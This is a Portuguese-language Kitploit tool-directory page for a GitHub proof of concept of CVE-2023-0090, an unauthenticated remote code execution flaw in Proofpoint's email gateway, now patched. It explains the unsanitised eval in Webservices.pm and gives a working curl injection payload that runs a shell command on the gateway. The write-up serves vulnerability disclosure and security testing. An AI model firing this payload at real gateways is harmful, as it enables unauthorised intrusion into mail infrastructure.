Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
proofpoint-CVE-2023-0090 — Proofpoint Email Gateway: RCE não autenticado | Kitploit
Ferramentas/GitHubGitHub/ly1g3/proofpoint-cve-2023-0090
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubly1g3/proofpoint-cve-2023-0090

proofpoint-CVE-2023-0090

Proofpoint Email Gateway: RCE não autenticado

Ver Repositório
11há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Sobre

Pesquisador de segurança: ly1g3, ly1g3[at]tuta.io

Impressão digital GPG: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Visão geral: Execução Remota de Código - RCE não autenticado

CVE: CVE-2023-0090

Linha do tempo:

  • Descoberto - ly1g3
  • Reportado - ly1g3
  • Corrigido - Proofpoint

Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73

Exploits para Proofpoint Messaging Security Gateway

Execução Remota de Código (RCE)

Com acesso à API WebServices, é possível obter RCE não autenticado com privilégios de administrador.

Detalhes Técnicos

O Webservices.pm não sanitiza nem verifica a entrada do usuário. Nenhuma autenticação é necessária para alcançar a função, mas o acesso à API deve estar habilitado nas configurações para ser possível executar RCE. O $module vem diretamente de dados do usuário e é avaliado.

root@kitploit:~

my $module = (split(/\//,$uri))[1];
$module = SERVICE_MODULE_PREFIX() . "::\u$module";

...


eval("require $module");

POC

Criará um arquivo chamado abc em /tmp/. O código é executado como usuário pps.

root@kitploit:~
curl -k -vv "https://192.168.80.80:10010/ws/abc%2bsystem(%60id%20>%20\\\$\{SHELL:0:1\}tmp\\\$\{SHELL:0:1\}abc%60)"
Baixar ferramenta